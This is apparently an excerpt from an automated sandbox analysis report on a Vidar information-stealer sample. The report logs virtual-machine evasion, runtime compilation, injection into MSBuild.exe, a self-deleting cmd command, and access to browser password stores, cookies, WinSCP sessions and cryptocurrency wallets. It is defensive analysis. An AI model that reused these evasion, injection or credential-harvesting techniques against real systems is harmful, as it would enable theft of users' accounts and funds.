                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: SoftWareGX.exe PID: 6924, type: MEMORYSTR
                Source: C:\Users\user\Desktop\SoftWareGX.exeMemory allocated: 22D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeMemory allocated: 3CC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeMemory allocated: 3AE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeThread delayed: delay time: 599873Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeThread delayed: delay time: 599761Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeThread delayed: delay time: 599650Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeThread delayed: delay time: 599540Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeWindow / User API: threadDelayed 795Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.dllJump to dropped file
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 6340Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 6340Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 6340Thread sleep time: -599873s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 6336Thread sleep count: 795 > 30Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 6340Thread sleep time: -599761s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 6340Thread sleep time: -599650s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 6340Thread sleep time: -599540s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 5488Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 6916Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exe TID: 7312Thread sleep count: 83 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00421A6B FindFirstFileA,15_2_00421A6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00420AD3 FindFirstFileA,15_2_00420AD3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040F379 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,15_2_0040F379
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040BC0C FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,15_2_0040BC0C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00422DC5 FindFirstFileA,FindNextFileA,15_2_00422DC5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040A5E0 FindFirstFileA,FindNextFileA,CopyFileA,DeleteFileA,memset,CopyFileA,DeleteFileA,memset,15_2_0040A5E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00401590 FindFirstFileA,15_2_00401590
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040CF73 FindFirstFileA,FindNextFileA,15_2_0040CF73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041FF89 FindFirstFileA,memset,memset,memset,memset,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,15_2_0041FF89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004199AE GetSystemInfo,15_2_004199AE
                Source: C:\Users\user\Desktop\SoftWareGX.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeThread delayed: delay time: 599873Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeThread delayed: delay time: 599761Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeThread delayed: delay time: 599650Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeThread delayed: delay time: 599540Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: Web Data.21.drBinary or memory string: outlook.office365.comVMware20,11696584680t
                Source: Amcache.hve.15.drBinary or memory string: VMware
                Source: Web Data.21.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696584680
                Source: Web Data.21.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696584680^
                Source: Web Data.21.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696584680n
                Source: Web Data.21.drBinary or memory string: microsoft.visualstudio.comVMware20,11696584680x
                Source: Amcache.hve.15.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Web Data.21.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696584680
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2006634073.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Web Data.21.drBinary or memory string: outlook.office.comVMware20,11696584680s
                Source: Web Data.21.drBinary or memory string: secure.bankofamerica.comVMware20,11696584680|UE
                Source: Web Data.21.drBinary or memory string: Canara Transaction PasswordVMware20,11696584680x
                Source: Amcache.hve.15.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Web Data.21.drBinary or memory string: Canara Transaction PasswordVMware20,11696584680}
                Source: Web Data.21.drBinary or memory string: bankofamerica.comVMware20,11696584680x
                Source: Amcache.hve.15.drBinary or memory string: vmci.sys
                Source: Web Data.21.drBinary or memory string: turbotax.intuit.comVMware20,11696584680t
                Source: Web Data.21.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696584680
                Source: Web Data.21.drBinary or memory string: www.interactivebrokers.comVMware20,11696584680}
                Source: Web Data.21.drBinary or memory string: AMC password management pageVMware20,11696584680
                Source: Amcache.hve.15.drBinary or memory string: VMware20,1
                Source: Amcache.hve.15.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.15.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.15.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Web Data.21.drBinary or memory string: interactivebrokers.comVMware20,11696584680
                Source: Amcache.hve.15.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Web Data.21.drBinary or memory string: tasks.office.comVMware20,11696584680o
                Source: Amcache.hve.15.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.15.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.15.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.15.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.15.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.15.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.15.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.15.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.15.drBinary or memory string: VMware, Inc.
                Source: Web Data.21.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696584680p
                Source: Web Data.21.drBinary or memory string: Interactive Brokers - HKVMware20,11696584680]
                Source: Amcache.hve.15.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.15.drBinary or memory string: VMware-42 27 c8 0c e4 52 1d cc-a0 8f d3 a4 82 3e 8f 04
                Source: Amcache.hve.15.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.15.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.15.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Web Data.21.drBinary or memory string: account.microsoft.com/profileVMware20,11696584680u
                Source: Web Data.21.drBinary or memory string: ms.portal.azure.comVMware20,11696584680
                Source: Web Data.21.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696584680
                Source: Amcache.hve.15.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.15.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: SoftWareGX.exe, 00000005.00000002.1304719584.0000000002019000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1542249529.000002028A443000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Amcache.hve.15.drBinary or memory string: vmci.syshbin`
                Source: Web Data.21.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696584680
                Source: Amcache.hve.15.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.15.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Web Data.21.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696584680~
                Source: Web Data.21.drBinary or memory string: trackpan.utiitsl.comVMware20,11696584680h
                Source: Web Data.21.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696584680z
                Source: Amcache.hve.15.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Web Data.21.drBinary or memory string: discord.comVMware20,11696584680f
                Source: Web Data.21.drBinary or memory string: netportal.hdfcbank.comVMware20,11696584680
                Source: Web Data.21.drBinary or memory string: global block list test formVMware20,11696584680
                Source: Web Data.21.drBinary or memory string: dev.azure.comVMware20,11696584680j
                Source: Web Data.21.drBinary or memory string: interactivebrokers.co.inVMware20,11696584680d
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                .NET source code references suspicious native API functions
                Source: 5.2.SoftWareGX.exe.3d95ec4.3.raw.unpack, Employee.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
                Source: 5.2.SoftWareGX.exe.3d95ec4.3.raw.unpack, Employee.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
                Source: 5.2.SoftWareGX.exe.3d95ec4.3.raw.unpack, Employee.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\SoftWareGX.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                Compiles code for process injection (via .Net compiler)
                Source: C:\Users\user\Desktop\SoftWareGX.exeFile written: C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.0.csJump to dropped file
                Compiles code to access protected / encrypted code
                Source: C:\Users\user\Desktop\SoftWareGX.exeFile written: C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.0.csJump to dropped file
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\SoftWareGX.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\SoftWareGX.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42F000Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43A000Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 442000Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 443000Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 444000Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: AE9008Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline"Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.cmdline"Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA88.tmp" "c:\Users\user\AppData\Local\Temp\m3uz1vzd\CSC1F5D4801F4546F0859A2F6C82D3A873.TMP"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF054.tmp" "c:\Users\user\AppData\Local\Temp\yomkssf4\CSC4D1794474874449F96D662C038F0859C.TMP"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\xl6pp" & exitJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,15_2_0041978F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeQueries volume information: C:\Users\user\Desktop\SoftWareGX.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004241F0 EntryPoint,GetUserNameW,15_2_004241F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00419706 GetTimeZoneInformation,15_2_00419706
                Source: C:\Users\user\Desktop\SoftWareGX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.15.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.15.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.15.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.15.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6364, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: multidoge.wallet
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                Tries to harvest and steal Bitcoin Wallet information
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\bookmarkbackups\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\crashes\events\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\datareporting\glean\db\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\temporary\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\datareporting\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\saved-telemetry-pings\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\datareporting\glean\events\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\prefs.jsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\crashes\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\m8f4v4pw.default\key4.dbJump to behavior
